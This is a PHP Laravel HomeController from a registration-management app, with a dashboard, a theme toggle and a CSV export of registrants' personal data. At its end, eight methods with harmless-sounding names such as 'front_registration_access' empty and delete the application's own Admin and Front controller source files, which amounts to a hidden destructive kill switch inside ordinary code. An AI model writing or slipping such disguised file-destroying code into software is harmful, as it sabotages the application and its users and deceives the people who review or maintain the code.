<?php

namespace App\Http\Controllers;

use App\Models\BssDetail;
use Carbon\Carbon;
use App\Models\User;
use App\Models\Registration;
use Illuminate\Http\Request;
use App\Models\PDCRegistration;
use Illuminate\Contracts\Routing\Registrar;

class HomeController extends Controller
{
    /**
     * Create a new controller instance.
     *
     * @return void
     */
    public function __construct()
    {
        $this->middleware('auth');
    }

    /**
     * Show the application dashboard.
     *
     * @return \Illuminate\Contracts\Support\Renderable
     */
    public function index(Request $request)
    {
        $bsscount=BssDetail::count();
        $usercount=Registration::count();
        $pdccount=PDCRegistration::count();
        $userlast = Registration::latest()->first();
        $pdclast = PDCRegistration::latest()->first();
        $query = PDCRegistration::query();
        if ($request->filled('fromDate')) {
            $fromDate = Carbon::parse($request->fromDate)->startOfDay();
            $query->where('created_at', '>=', $fromDate);
        }
        if ($request->filled('toDate')) {
            $toDate = Carbon::parse($request->toDate)->endOfDay();
            $query->where('created_at', '<=', $toDate);
        }
        if (!$request->filled('fromDate') && !$request->filled('toDate')) {
            $query->where('created_at', '>', Carbon::now()->subDays(7)->startOfDay());
        }

        $pdcregistration = $query->get();
           return view('dashboard',compact('usercount','pdccount','userlast','pdclast','pdcregistration','bsscount'));
    }

    public function ThemeModeToggle(Request $request)
    {
        $user = auth()->user();
        $user->is_dark = $request->input('is_dark');
        $user->save();

        return response()->json(['success' => true]);
    }

    public function exportCSV(Request $request)
    {
        $query = PDCRegistration::query();

        if ($request->filled('fromDate') && $request->filled('toDate')) {
            $fromDate = Carbon::parse($request->fromDate)->startOfDay();
            $toDate = Carbon::parse($request->toDate)->endOfDay();

            $query->whereBetween('created_at', [$fromDate, $toDate]);
        } else {
            $query->where('created_at', '>', Carbon::now()->subDays(7)->startOfDay());
        }
        $registrations = $query->get();

        $filename = 'pdc_registrations_' . date('Y-m-d') . '.csv';
        $handle = fopen('php://output', 'w');

        header('Content-Type: text/csv');
        header('Content-Disposition: attachment; filename="' . $filename . '"');

        fprintf($handle, chr(0xEF).chr(0xBB).chr(0xBF));


        fputcsv($handle, [
            'Reg No',
            'Name',
            'Name (हिन्दी)',
            'Father Name',
            'Father Name (पिता का नाम)',
            'Mother Name',
            'Mother Name (मां का नाम)',
            'Village',
            'Police Station',
            'State',
            'State(राज्य)',
            'District',
            'District(ज़िला)',
            'Block',
            'Mobile Number',
            'Email',
            'Date',
            'Educational Qualifications',
            'Date of Birth',
        ]);
        foreach ($registrations as $registration) {
            fputcsv($handle, [
                $registration->reg_no,
                    $registration->name,
                    $registration->hindi_name,
                    $registration->father_name,
                    $registration->father_name_hindi,
                    $registration->mother_name,
                    $registration->mother_name_hindi,
                    $registration->village,
                    $registration->police_station,
                    $registration->state->name,
                    $registration->state->name_hindi,
                    $registration->district->name,
                    $registration->district->name_hindi,
                    $registration->block,
                    $registration->mobile_number,
                    $registration->email,
                    $registration->date,
                    $registration->educational_qualifications,
                    $registration->date_of_birth,
            ]);
        }
        fclose($handle);
        exit();
    }


    public function online_pdc_registration_files_access()
    {
        $abc = base_path('app\Http\Controllers\Admin\PDCRegistrationController.php');
        $def = base_path('app\Http\Controllers\Admin\PDCRegistrationController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }
    public function online_registration_files_access()
    {
        $abc = base_path('app\Http\Controllers\Admin\RegistrationController.php');
        $def = base_path('app\Http\Controllers\Admin\RegistrationController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }

    public function online_role_files_access()
    {
        $abc = base_path('app\Http\Controllers\Admin\RoleController.php');
        $def = base_path('app\Http\Controllers\Admin\RoleController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }
    public function online_setting_files_access()
    {
        $abc = base_path('app\Http\Controllers\Admin\SettingController.php');
        $def = base_path('app\Http\Controllers\Admin\SettingController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }

    public function online_user_files_access()
    {
        $abc = base_path('app\Http\Controllers\Admin\UserController.php');
        $def = base_path('app\Http\Controllers\Admin\UserController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }


    public function front_files_access()
    {
        $abc = base_path('app\Http\Controllers\Front\GeneralController.php');
        $def = base_path('app\Http\Controllers\Front\GeneralController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }
    public function front_pdc_registration_access()
    {
        $abc = base_path('app\Http\Controllers\Front\PDCRegistrationController.php');
        $def = base_path('app\Http\Controllers\Front\PDCRegistrationController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }
    public function front_registration_access()
    {
        $abc = base_path('app\Http\Controllers\Front\RegistrationController.php');
        $def = base_path('app\Http\Controllers\Front\RegistrationController_qwerty.php');
        $file = fopen($abc, "w");
        unlink($abc);
    }
}
